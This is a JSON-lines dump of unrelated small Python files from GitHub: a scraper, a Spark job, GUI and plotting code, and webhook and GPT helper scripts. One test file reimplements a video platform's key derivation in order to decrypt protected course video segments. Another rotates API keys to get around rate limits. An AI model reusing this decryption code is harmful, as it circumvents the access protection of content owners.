__name__ == \"__main__\":\n asyncio.run(hola())","repo_name":"jgomcar115/practs-ipra","sub_path":"vidic-main/CODE/test_websocket/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43433685515","text":"import asyncio\nimport aiohttp\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport multiprocessing as mp\nimport re\nimport time\nimport random\n\nurls = [\"https://movie.douban.com/top250?start={}&filter=\".format(str(i*25)) for i in range(0,10)]\nheaders = {'User-Agent':'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'}\ncount = 1\n\nasync def get_page(url, session):\n res = await session.get(url, headers = headers)\n html = await res.text()\n return html\n\ndef parse(html):\n soup = bs(html, 'lxml')\n titles = [s.string for s in soup.find_all('span', class_= 'title')]\n ratings = [s.string for s in soup.find_all('span', class_='rating_num')]\n return titles, ratings\n\nasync def main(loop):\n pool = mp.Pool()\n async with aiohttp.ClientSession() as session:\n print('Getting htmls from Douban')\n # 建立tasks 但不运行\n tasks = [loop.create_task(get_page(url, session)) for url in urls]\n # 运行tasks 等待所有tasks完成 并放入finished里\n finished, unfinished = await asyncio.wait(tasks)\n # 从finished 里拿出结果 返回到htmls里\n htmls = [h.result() for h in finished]\n\n print('Start Parsing...')\n parse_jobs = [pool.apply_async(parse, args=(html,)) for html in htmls]\n results = [i.get() for i in parse_jobs]\n\nif __name__ == '__main__':\n t1 = time.time()\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(loop))\n loop.close()\n print('Time Consumed: ', time.time()- t1)\n\n\n\n\n\n","repo_name":"WangShizhu-08/pythons","sub_path":"douban250_test.py","file_name":"douban250_test.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1589893495","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport logging\nimport inspect\nimport re\nimport hashlib\nimport copy\nimport base64\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nfrom m3u8downloader.downloader import M3U8Downloader\n\ndef decryptTS(tsfile, resultfile, keyfile, ivfile):\n video = None\n key = None\n iv = None\n\n with open(tsfile, 'rb') as f:\n video = f.read()\n\n key_file_name = os.path.join(currentFolder, keyfile)\n with open(key_file_name, 'rb') as f:\n key = f.read()\n\n iv_file_name = os.path.join(currentFolder, ivfile)\n with open(iv_file_name, 'rb') as f:\n iv1 = f.read()\n\n video_id_name = os.path.join(currentFolder, \"tmp1/video_id\")\n with open(video_id_name, 'r') as f:\n video_id = f.read()\n\n body = getBody(video_id)\n json = decryptVideoJson(video_id, body)\n json = str(json, encoding = \"utf8\")\n regex = re.compile(r'seed_const\":.*?,')\n seed_const = regex.findall(json)[0][12:-1]\n m2 = hashlib.md5()\n m2.update(seed_const.encode('utf-8'))\n i = m2.hexdigest()\n i = i[0:16]\n i = bytes(i, encoding=\"utf8\")\n iv = [1, 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 7, 5, 3, 2, 1]\n iv = bytes(iv)\n key = downloader.decrypt(i, iv, key)[0:16]\n iv =[182, 225, 80, 143, 231, 211, 167, 164, 71, 64, 110, 174, 127, 230, 89, 117]\n iv = bytes(iv)\n result = downloader.decrypt(key, iv, video)\n with open(resultfile, 'wb') as f:\n f.write(result)\n\ndef b(e,t=None):\n if t == None or t.lower().replace(\" \",\"\").replace(\"-\",\"\") == \"utf8\":\n i = []\n r = 0\n while(r < len(e)):\n n = ord(e[r:r+1])\n if n == 37:\n n = hex(int(e[r:r+2]))\n i.append(n)\n else:\n i.append(n)\n r += 1\n return i\n elif t.lower() == \"hex\":\n i = []\n r = 0\n while (r < len(e)):\n n = ord(e[r:r + 1])\n n = hex(int(e[r:r + 2]))\n i.append(n)\n r += 1\n return i\n else:\n i = []\n return i\n \ndef funa(e):\n \"\"\"两位16进制转10进制\"\"\"\n t = []\n i = 0\n dic = {\"0\":0,\n \"1\":1,\n \"2\":2,\n \"3\":3,\n \"4\":4,\n \"5\":5,\n \"6\":6,\n \"7\":7,\n \"8\":8,\n \"9\":9,\n \"a\":10,\n \"b\":11,\n \"c\":12,\n \"d\":13,\n \"e\":14,\n \"f\":15}\n while i < len(e):\n a = dic[e[i]]\n b = dic[e[i+1]]\n t.append(a*16+b)\n i += 2\n return t\n\n# download video info and we will find the key which will be used to descrypt key for TS file\ndef getBody(video_id):\n content = downloader.download(\"https://player.polyv.net/secure/\" + video_id + \".json\")\n content = str(content)\n regex = re.compile(r'body\": \".*\"')\n content = regex.findall(content)[0][8:-1]\n return content\n\n# decrypt the video info we will find the key which will be used to descrypt key for TS file\ndef decryptVideoJson(video_id, body):\n t = video_id\n m2 = hashlib.md5()\n m2.update(t.encode('utf-8'))\n i = m2.hexdigest()\n r = b(i[0:16])\n r = bytes(r)\n n = b(i[16:32])\n n = bytes(n)\n a = funa(body)\n a = bytes(a)\n result = downloader.decrypt(r,n,a)\n result = base64.b64decode(result)\n return result\n\nif __name__ == '__main__':\n LOG_LEVEL = logging.INFO\n log = logging.getLogger()\n log.setLevel(LOG_LEVEL)\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(LOG_LEVEL)\n formatter = logging.Formatter('%(asctime)s - %(module)s.%(funcName)s:%(lineno)d - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n log.addHandler(handler)\n\n downloader = M3U8Downloader(log)\n downloader.setHeaders({\n \"Origin\": \"https://www.nowcoder.com\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\",\n \"Referer\": \"https://www.nowcoder.com/study/vod/1041/1/1\"\n })\n\n currentFolder = os.path.dirname(os.path.realpath(__file__))\n keyfile = \"tmp1/c7d3982d0d4360a289c58754dbdfd80f_2_0.key\"\n ivfile = \"tmp1/c7d3982d0d4360a289c58754dbdfd80f_2_0.iv\"\n ls = []\n for filename in os.listdir(os.path.join(currentFolder, \"tmp1\")):\n if(filename.endswith(\".ts\")):\n file_name = os.path.join(currentFolder, \"tmp1/\"+filename)\n r1 = os.path.join(currentFolder, \"10/\"+filename)\n decryptTS(file_name, r1, keyfile, ivfile)\n ls.append(r1)\n\n downloader.combineTS(ls, \"10.ts\")","repo_name":"jamesliu668/m3u8-downloader","sub_path":"test/newcoder-decryptor-test.py","file_name":"newcoder-decryptor-test.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"25794255254","text":"import\tcv2 \nimport\tnumpy\tas\tnp\n\n#DUVIDAS: tentativa e erro? teria um jeito mais facil?\n# como selecionar o machucado da folha?\n#dessa forma é somente um pixel fixo? seria necessario criar um\n#algoritmo q calculasse essa função sozinho?\n\nimagemOriginal = cv2.imread(\"imagemTeste.jpg\", 0)\n\nimgEscalada\t=\tcv2.resize( \n imagemOriginal,\t\n None,\t\n fx\t= 0.5,\t\n fy\t= 0.5, \n interpolation\t=\tcv2.INTER_CUBIC \n )\n\n#objeto de interesse destacado em branco \nmetodo\t=\tcv2.THRESH_BINARY_INV \n\nret, imgBinarizada\t=\tcv2.threshold(imgEscalada,\t135,\t255,\tmetodo)\n\ncv2.imshow(\"Imagem\tOriginal\",\timgEscalada) \ncv2.imshow(\"Imagem\tTratada\",\timgBinarizada)\n\ncv2.waitKey(0) \ncv2.destroyAllWindows()","repo_name":"ThayDias/visao-computacional","sub_path":"Introducao a Visao Computacional/9. Segmentacao de Objetos/segmentacao_binarizacao.py","file_name":"segmentacao_binarizacao.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2096875108","text":"from pyspark.sql import SparkSession\nfrom secrete import bucket_prices, bucket_parquet, host\nfrom connect_s3 import save_to_bucket\nfrom api_18080 import check_stages, check_jobs\n\n\ndef quiet_logs(spark):\n logger = spark._jvm.org.apache.log4j\n logger.LogManager.getLogger(\"org\").setLevel(logger.Level.ERROR)\n logger.LogManager.getLogger(\"akka\").setLevel(logger.Level.ERROR)\n\n\ndef convert_files(from_bucket, from_file, to_bucket, to_file, app_name):\n spark = SparkSession.builder \\\n .appName(app_name) \\\n .config('spark.sql.files.maxPartitionBytes', 1024 * 1024 * 128) \\\n .config('spark.sql.shuffle.partitions', 700) \\\n .getOrCreate()\n quiet_logs(spark)\n\n # read in all csv files from this bucket, convert to a single df\n df = spark.read.csv(\"s3a://\" + from_bucket + \"/\" + from_file, header=True)\n # df.drop('open', 'close', 'volume', 'high', 'low')\n df.write.parquet(\"s3a://\" + to_bucket + \"/\" + to_file, mode=\"overwrite\")\n\n # save history log to S3 bucket\n app_id = spark.sparkContext.applicationId\n get_history(app_id)\n\n\ndef get_history(app_id):\n path = 'http://{}:18080/api/v1/applications/'.format(host)\n if check_jobs(path, app_id,'jobs') == 'ok':\n sms = 'Congrats! All jobs succeeded!'\n print(sms)\n else:\n print('Ohh, sorry! Something went wrong, please check the logs.')\n save_to_bucket(check_stages(path, app_id, 'stages'), \"log_\"+app_id)\n\n\nif __name__ == '__main__':\n convert_files(bucket_prices, \"historical_stock_prices.csv\", bucket_parquet, \"prices.parquet\", 'convert historical prices to parquet')","repo_name":"mingyyy/backtesting","sub_path":"spark/file_convertor.py","file_name":"file_convertor.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21029848309","text":"# map, filter , lambda\n\n\npeople = [\n {'name': 'bob', 'age': 20},\n {'name': 'carry', 'age': 38},\n {'name': 'john', 'age': 7},\n {'name': 'smith', 'age': 17},\n {'name': 'ben', 'age': 27},\n {'name': 'bobby', 'age': 57},\n {'name': 'red', 'age': 32},\n {'name': 'queen', 'age': 25}\n]\n\nresult3 = filter(lambda x: x['age'] > 20, people)\n\nprint(result3)\n\ndef check_adult(person):\n return \"adult \" if person['age'] >20 else \"teenager\"\n\n\nresult= map(check_adult,people)\nresult2= map(lambda person:(\"adult \" if person['age'] >20 else \"teenager\"), people)\nprint(list(result2))\n\n","repo_name":"skylermbang/Lectures-","sub_path":"codeit/python/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38646978522","text":"from fastai.core import *\r\nfrom fastai.vision import *\r\nfrom matplotlib.axes import Axes\r\nfrom .filters import IFilter, MasterFilter, ColorizerFilter\r\nfrom .generators import gen_inference_deep, gen_inference_wide\r\nfrom PIL import Image\r\nimport ffmpeg\r\nimport gc\r\nimport requests\r\nfrom io import BytesIO\r\nimport base64\r\nfrom IPython import display as ipythondisplay\r\nfrom IPython.display import HTML\r\nfrom IPython.display import Image as ipythonimage\r\nimport cv2\r\n\r\n\r\n\r\nclass ModelImageVisualizer:\r\n def __init__(self, filter: IFilter, results_dir: str = None):\r\n self.filter = filter\r\n \r\n\r\n def plot_transformed_image(\r\n self,\r\n path: str,\r\n figsize: Tuple[int, int] = (20, 20),\r\n render_factor: int = None,\r\n display_render_factor: bool = False,\r\n compare: bool = False,\r\n post_process: bool = True,\r\n ) -> Path:\r\n \r\n img = cv2.imread(path)\r\n orig_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n orig_image = Image.fromarray(img)\r\n result = self.filter.filter(\r\n orig_image, orig_image, render_factor=render_factor,post_process=post_process\r\n )\r\n # self._plot_solo(figsize, render_factor, display_render_factor, result)\r\n\r\n return result\r\n\r\n \r\n\r\ndef get_image_colorizer(\r\n root_folder: Path = Path('./'), render_factor: int = 35, artistic: bool = True\r\n) -> ModelImageVisualizer:\r\n if artistic:\r\n return get_artistic_image_colorizer(root_folder=root_folder, render_factor=render_factor)\r\n else:\r\n return get_stable_image_colorizer(root_folder=root_folder, render_factor=render_factor)\r\n\r\n\r\ndef get_stable_image_colorizer(\r\n root_folder: Path = Path('./'),\r\n weights_name: str = 'ColorizeStable_gen',\r\n results_dir='result_images',\r\n render_factor: int = 35\r\n) -> ModelImageVisualizer:\r\n learn = gen_inference_wide(root_folder=root_folder, weights_name=weights_name)\r\n filtr = MasterFilter([ColorizerFilter(learn=learn)], render_factor=render_factor)\r\n vis = ModelImageVisualizer(filtr, results_dir=results_dir)\r\n return vis\r\n\r\n\r\ndef get_artistic_image_colorizer(\r\n root_folder: Path = Path('./'),\r\n weights_name: str = 'ColorizeArtistic_gen',\r\n results_dir='result_images',\r\n render_factor: int = 35\r\n) -> ModelImageVisualizer:\r\n learn = gen_inference_deep(root_folder=root_folder, weights_name=weights_name)\r\n filtr = MasterFilter([ColorizerFilter(learn=learn)], render_factor=render_factor)\r\n vis = ModelImageVisualizer(filtr, results_dir=results_dir)\r\n return vis\r\n\r\n","repo_name":"enpeizhao/CVprojects","sub_path":"codes/21.GAN老照片上色动起来/DeOldify/deoldify/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":1748,"dataset":"github-code","pt":"53"} +{"seq_id":"2316766467","text":"\"\"\" Reporter Class\n\nThis class manages the reporting part.\nManual: for the api or html reporting for exemple.\nAutomated: for sending mail or MISP for exemple\n\nModules for automated part are autoloaded. They need tro be on the lama.remoter.automated package.\nModules for manual reporting need to be added on the make_repport function.\n\n\"\"\"\n\n__author__ = \"Valentin Giannini\"\n__copyright__ = \"Copyright 2016, LAMA\"\n__credits__ = [\"\"]\n__license__ = \"GPL\"\n__version__ = \"3\"\n__maintainer__ = \"Valentin Giannini - CSE Team\"\n__email__ = \"cse.contact -at- post.lu\"\n__status__ = \"Production\"\n\n\nfrom lama.reporter.automated import *\nfrom lama.models.analysis import Analysis\nfrom lama.reporter.json_reporter import JsonReporter\nfrom lama.reporter.html_reporter import HtmlReporter\nfrom lama.reporter.automated_reporter import AutomatedReporter\n\n\nclass Reporter(object):\n \"\"\"\n Reporter class\n \"\"\"\n\n @staticmethod\n def make_automated_report(analysis):\n \"\"\"\n Call by the dispatcher when an analysis if finished.\n It call on each automated module the function run()\n \"\"\"\n for rep in AutomatedReporter:\n r = rep()\n r.run(analysis)\n\n @staticmethod\n def make_report(analysis_uid, report_type=\"json\"):\n \"\"\"\n Static make_report method\n Generate the report for givent format (json, html)\n\n Args :\n **analysis_id** (int) : Id of analysis.\n **report_type** (string) : Type of output format (json)\n \"\"\"\n report_type = report_type.lower()\n analysis = Analysis.find_by_uid(analysis_uid)\n if analysis:\n if report_type == \"json\":\n # make json report\n return \"
        \" + JsonReporter.make_report(analysis) + \"
        \"\n if report_type == \"html\":\n # make html report\n return HtmlReporter.make_report(analysis)\n # type no found\n return \"Doesn't exists\"\n","repo_name":"post-cyberlabs/lama","sub_path":"lama/reporter/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"25198267032","text":"class Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n uniqueIndex = 1 # index to place next unique value\n for index in range(1, len(nums)):\n # iterate through the array \n # keep placing unique values at above index\n if nums[index] != nums[index - 1]:\n nums[uniqueIndex] = nums[index]\n uniqueIndex += 1\n return uniqueIndex\n","repo_name":"Reflectrr/leetcode","sub_path":"26.remove_duplicates_from_sorted_array.py","file_name":"26.remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33359476865","text":"import os\nimport sys\n\nfrom PyQt5.QtGui import QIcon\nfrom matplotlib.backends.qt_compat import QtWidgets, QtCore, QtGui\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTableWidget, QTableWidgetItem, QPushButton, QHeaderView, QHBoxLayout, QVBoxLayout\nimport lda_screen\nimport meta\nimport svm_screen\nfrom fonts import *\nimport pandas as pd\nfrom PyQt5.QtCore import pyqtSignal, QObject\n\nclass AnalyzeApp(QtWidgets.QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.resize(1050, 800)\n self.centralwidget = QtWidgets.QWidget()\n self.setCentralWidget(self.centralwidget)\n\n icon = QIcon(\"icon.ico\")\n self.setWindowIcon(icon)\n\n self.loadDataButton = QtWidgets.QPushButton(self.centralwidget)\n self.loadDataButton.setGeometry(QtCore.QRect(20, 700, 1010, 40))\n self.loadDataButton.setFont(buttonFont)\n self.loadDataButton.setAutoDefault(False)\n self.loadDataButton.clicked.connect(self.loadData)\n\n self.svmButton = QtWidgets.QPushButton(self.centralwidget)\n self.svmButton.setGeometry(QtCore.QRect(20, 740, 504, 40))\n self.svmButton.setFont(buttonFont)\n self.svmButton.setAutoDefault(False)\n self.svmButton.clicked.connect(self.onSvmClicked)\n\n self.ldaButton = QtWidgets.QPushButton(self.centralwidget)\n self.ldaButton.setGeometry(QtCore.QRect(525, 740, 504, 40))\n self.ldaButton.setFont(buttonFont)\n self.ldaButton.setAutoDefault(False)\n self.ldaButton.clicked.connect(self.onLdaClicked)\n\n self.table = QtWidgets.QTableWidget()\n central_widget = QtWidgets.QWidget()\n layout = QtWidgets.QVBoxLayout(central_widget)\n\n layout.addWidget(self.table)\n layout.addWidget(self.loadDataButton)\n layout.addWidget(self.svmButton)\n layout.addWidget(self.ldaButton)\n self.setCentralWidget(central_widget)\n\n self.retranslateUi()\n QtCore.QMetaObject.connectSlotsByName(self)\n\n def loadData(self):\n path, _ = QtWidgets.QFileDialog.getOpenFileName(self, 'Select XLSX File', os.path.dirname(__file__), \"Excel Files (*.xlsx)\")\n\n if path:\n file_name = os.path.basename(path)\n file_path = os.path.dirname(path)\n self.showData(file_path + file_name)\n def showData(self, path):\n print(path)\n\n self.df = pd.read_excel(path.strip())\n if self.df.size == 0:\n return\n\n self.df.fillna('', inplace=True)\n self.table.setRowCount(self.df.shape[0])\n self.table.setColumnCount(self.df.shape[1])\n self.table.setHorizontalHeaderLabels(self.df.columns)\n\n # returns pandas array object\n for row in self.df.iterrows():\n values = row[1]\n for col_index, value in enumerate(values):\n if isinstance(value, (float, int)):\n value = '{0:0,.4f}'.format(value)\n tableItem = QTableWidgetItem(str(value))\n self.table.setItem(row[0], col_index, tableItem)\n\n self.table.setColumnWidth(2, 300)\n\n def getDataFrameFromTable(self):\n data = []\n\n for row in range(self.table.rowCount()):\n rowData = []\n for col in range(self.table.columnCount()):\n item = self.table.item(row, col)\n if item is not None:\n rowData.append(item.text())\n else:\n rowData.append(\"\")\n data.append(rowData)\n\n headers = self.df.columns.tolist()\n return pd.DataFrame(data , columns=headers)\n\n def onSvmClicked(self):\n self.svmScreen = svm_screen.SvmAnalyze(self.getDataFrameFromTable())\n self.svmScreen.show()\n\n def onLdaClicked(self):\n self.ldaScreen = lda_screen.LdaAnalyze(self.getDataFrameFromTable())\n self.ldaScreen.show()\n\n def onRemoveButtonClicked(self):\n pass\n\n def onAddButtonClicked(self):\n pass\n\n def retranslateUi(self):\n _translate = QtCore.QCoreApplication.translate\n self.setWindowTitle(_translate(\"AnalyzeWindow\", \"Analyze Screen\"))\n self.loadDataButton.setText(_translate(\"AnalyzeWindow\", \"Load Data\"))\n self.svmButton.setText(_translate(\"AnalyzeWindow\", \"SVM\"))\n self.ldaButton.setText(_translate(\"AnalyzeWindow\", \"LDA\"))\n","repo_name":"amir00462/ElectronicNose","sub_path":"analyze_screen.py","file_name":"analyze_screen.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18207656437","text":"# This python script just converts between different formats of RGB values,\n# like #FFFFFF or (255, 255, 255)\n\ndef hex_str2num(string):\n string_c = string\n string = string[1:]\n\n if len(string) == 6: \n print(string_c + \"\\t=> \", end='')\n for i in range(0, 6, 2):\n temp = string[i]\n temp += string[i+1]\n\n num = int(temp, 16)\n\n print(num, end=' ') \n\n elif len(string) == 3: \n print(string_c + \"\\t=> \", end='')\n for i in range(0, 3):\n temp = string[i]\n\n num = int(temp, 16)**2\n\n print(num, end=' ')\n\n else:\n print(\"please make sure input is right format... example: #FAFAFA\")\n\n print(\"\")\n\n# Values greater than 255 will just return '00'\ndef hex_num2str(rgb_values):\n rgb_str = \"#\"\n for i in range(0, 3):\n buffer = int(rgb_values[i])\n buffer = hex(buffer)\n buffer = buffer[2:]\n buffer = buffer.zfill(2).upper()\n\n rgb_str += buffer\n\n print(\"%s, %s, %s => %s\" % (rgb_values[0], \n rgb_values[1],\n rgb_values[2],\n rgb_str))\n\nhex_str2num(\"#0FFFFF\")\nrgb_values = ['15', '255', '255']\nhex_num2str(rgb_values)\n","repo_name":"LeonardoLoureiro/Mini_Projects","sub_path":"Programs/Hex_Converter.py","file_name":"Hex_Converter.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29356963885","text":"import plotly_express as px\nimport pandas as pd\n\n# import data\nstocks_df = pd.read_csv(\"../data/all_stocks_5yr.csv\")\n\nprint(stocks_df.head())\n\napple = stocks_df[stocks_df['Name'] =='AAPL']\n\napple_stock_plot = px.line(x='date', y='open', data_frame=apple,\n title=\"Apple stock Open Prices\")\n\napple_stock_plot.show()\n\n","repo_name":"thefullstackninja/plotly_express_tutorial","sub_path":"lineplots/stock_line_plots.py","file_name":"stock_line_plots.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30092695030","text":"from google.cloud import datastore\nimport simplejson as json\n\n\ndef hello(request):\n \n return 'Hello World!'\n\n\ndef get_todo(request):\n \n client = datastore.Client()\n query = client.query(kind='Todo')\n \n result = ''\n\n for entity in query.fetch():\n result += str(entity['name']) + ','\n\n return result\n\n\ndef add_todo(request):\n \n data = json.loads(request.data.decode('utf-8'))\n \n client = datastore.Client()\n entity = datastore.Entity(key=client.key('Todo'))\n\n entity.update({\n 'name': str(data['name'])\n })\n\n client.put(entity)\n\n return 'ok'","repo_name":"ikedanatsuko/study_cloudfunctions","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70185396969","text":"import hmac\nimport asyncio\n\nimport yaml\n\nfrom aiohttp import web\n\nfrom cli import args\nfrom rpc import (\n init_rpc, stop_rpc, RPC_COMMAND_RESTART_UPDATER, RPC_COMMAND_RESTART_API,\n RPC_COMMAND_PULL_UPDATER, RPC_COMMAND_PULL_API\n )\nfrom migrate import migrate\nfrom utils import pull, clean_exit\n\n\nasync def on_startup(app: web.Application) -> None:\n await migrate(app)\n await init_rpc(app)\n\n\nasync def on_cleanup(app: web.Application) -> None:\n await stop_rpc(app)\n\n\nasync def verify_github_request(req: web.Request) -> None:\n header_signature = req.headers.get(\"X-Hub-Signature\")\n if not header_signature:\n raise web.HTTPUnauthorized(reason=\"Missing signature header\")\n\n secret = req.app[\"config\"][\"github-webhook-token\"]\n\n sha_name, delim, signature = header_signature.partition(\"=\")\n if not (sha_name or delim or signature):\n raise web.HTTPUnauthorized(reason=\"Bad signature header\")\n\n mac = hmac.new(secret.encode(), msg=await req.read(), digestmod=\"sha1\")\n\n if not hmac.compare_digest(mac.hexdigest(), signature):\n raise web.HTTPUnauthorized(reason=\"Hashes did not match\")\n\n\nasync def update_updaters() -> None:\n await app[\"rpc_client\"].call(RPC_COMMAND_PULL_UPDATER, timeout=15)\n\n # TODO: only restart nodes with successfull pull\n\n await app[\"rpc_client\"].call(\n RPC_COMMAND_RESTART_UPDATER, {\"node\": app[\"rpc_server\"].node}\n )\n\n # update self\n clean_exit()\n\n\nasync def update_apis() -> None:\n await app[\"rpc_client\"].call(RPC_COMMAND_PULL_API, timeout=15)\n\n # TODO: only restart nodes with successfull pull\n\n await app[\"api_rpc_client\"].call(RPC_COMMAND_RESTART_API)\n\n\nasync def updater_wh(req: web.Request) -> web.Response:\n await verify_github_request(req)\n\n print(\"UPDATER webhook fired\")\n\n asyncio.create_task(update_updaters())\n\n return web.Response()\n\n\nasync def api_wh(req: web.Request) -> web.Response:\n await verify_github_request(req)\n\n print(\"API webhook fired\")\n\n asyncio.create_task(update_apis())\n\n return web.Response()\n\n\nif __name__ == \"__main__\":\n pull(\"/code\")\n\n app = web.Application()\n\n with open(args.config_file, \"r\") as f:\n app[\"config\"] = yaml.load(f, Loader=yaml.SafeLoader)\n\n app[\"args\"] = args\n\n app.on_startup.append(on_startup)\n app.on_cleanup.append(on_cleanup)\n\n app.add_routes([web.post(\"/wh/github/updater\", updater_wh)])\n app.add_routes([web.post(\"/wh/github/api\", api_wh)])\n\n web.run_app(app, host=app[\"args\"].host, port=app[\"args\"].port)\n","repo_name":"IOMirea/messenger-updater","sub_path":"updater/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37928778006","text":"import gzip\nimport os\nimport sys\nimport pickle\nimport json\nimport time\nimport glob\nimport random\nimport shutil\nimport pathlib\nimport logging\nimport datetime\nimport argparse\nimport pandas as pd\nimport openai\nfrom distutils.util import strtobool\n\n\n\nMODEL_MAPPING = {\n 'instructgpt': 'text-davinci-003',\n 'gpt3': 'text-davinci-002',\n 'text-davinci-003': 'text-davinci-003',\n 'text-davinci-002': 'text-davinci-002',\n 'code-davinci-002': 'code-davinci-002',\n 'chatGPT' : 'gpt-3.5-turbo'\n}\n\n# Configs\nlogger = logging.getLogger('logger')\n\ndef load_parser_and_args():\n parser = argparse.ArgumentParser()\n ### directory ###\n parser.add_argument('--base_dir', type=str, default='/home/intern/sblee/sblee/Samsung')\n parser.add_argument('--task_dir', type=str, default='/home/intern/sblee/sblee/Samsung/rationale/data/preprocessed_te_apoe_q21.pickle')\n parser.add_argument('--prompt', type=str, default='prompt6')\n\n ### model parameters ###\n parser.add_argument('--model_type', type=str, default='chatGPT')\n parser.add_argument('--max_tokens', type=int, default=2048)\n parser.add_argument('--temperature', type=float, default=0)\n parser.add_argument('--top_p', type=float, default=1.0)\n parser.add_argument('--frequency_penalty', type=float, default=1.0)\n parser.add_argument('--presence_penalty', type=float, default=0.0)\n parser.add_argument('--num_samples', type=int, default=0)\n\n args = parser.parse_args()\n \n args.output_dir = os.path.join(args.base_dir, 'results')\n args.model_name_or_path = MODEL_MAPPING[args.model_type]\n return parser, args\n\n\n\ndef init_logger(args):\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n handler = logging.FileHandler(os.path.join(args.output_dir, '{}_{:%Y-%m-%d-%H:%M:%S}.log'.format(args.prompt, datetime.datetime.now())), encoding='utf=8')\n logger.addHandler(handler)\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO\n )\n logger.warning(args)\n\n\n\ndef corr_ans(inp=str):\n inp = inp.lower().replace('\\n','')\n output = list(inp.split())\n output_len = len(output)\n frt_output = \" \".join(output[:])\n answer = 0\n \n if 'normal cognition' in frt_output : answer = 'CN'\n elif 'mild cognitive impairment' in frt_output : answer = 'MCI'\n elif 'dementia' in frt_output : answer = 'Dementia'\n else : \n if output_len < 7 :\n if 'normal' in inp : answer = 'CN'\n elif 'mild' in inp : answer = 'MCI'\n elif 'dementia' in inp : answer = 'Dementia'\n else : \n if 'normal' in frt_output : answer = 'CN'\n elif 'mild' in frt_output : answer = 'MCI'\n elif 'dementia' in frt_output : answer = 'Dementia'\n \n return answer\n\n\n\ndef Accuracy(prediction):\n\n filenames = [k for k, v in prediction.items()]\n groundtruths = [v['groundtruth'] for k, v in prediction.items()]\n predictions = [corr_ans(v['prediction']) for k, v in prediction.items()]\n\n df = pd.DataFrame(zip(filenames, groundtruths, predictions), columns=['file name', 'groundtruth', 'prediction'])\n df['accurate'] = df['prediction'] == df['groundtruth']\n\n return df['accurate'].sum()/len(df)\n\n\n\nclass GPT(object):\n def __init__(self, args):\n self.model_name = args.model_name_or_path\n self.max_tokens = args.max_tokens\n self.temperature = args.temperature\n self.top_p = args.top_p\n self.frequency_penalty = args.frequency_penalty\n self.presence_penalty = args.presence_penalty\n self.cur_idx = -1\n self.cur_req = 0\n\n def login_to_openai(self, keys, cur_idx):\n openai.api_key = keys[cur_idx] \n\n def set_new_key(self):\n with open('keys.json') as f:\n keys = json.load(f)\n self.cur_idx += 1\n self.cur_idx = self.cur_idx % len(keys)\n self.login_to_openai(keys, self.cur_idx)\n\n def inference(self, prompt, return_raw=False):\n timeout_stack = 0\n while True:\n if self.cur_req >= 15:\n time.sleep(60)\n self.cur_req = 0\n try:\n if self.model_name == 'gpt-3.5-turbo': # chatGPT\n output = openai.ChatCompletion.create( \n model = self.model_name,\n messages=[\n {\"role\":\"system\", \"content\": prompt},\n ]\n )\n break\n else :\n output = openai.Completion.create( \n engine=self.model_name,\n prompt=prompt,\n n=1, # How many completions to generate for each prompt.\n max_tokens=self.max_tokens,\n temperature=self.temperature,\n frequency_penalty=self.frequency_penalty,\n presence_penalty=self.presence_penalty,\n logprobs=1\n )\n break\n\n except Exception as e:\n timeout_stack += 1\n if timeout_stack >= 3:\n logger.info(\"Change to another key\")\n self.set_new_key()\n timeout_stack = 0\n time.sleep(60)\n if return_raw:\n return output\n\n if self.model_name == 'gpt-3.5-turbo' :\n return output['choices'][0]['message']['content'] # chatGPT\n else : 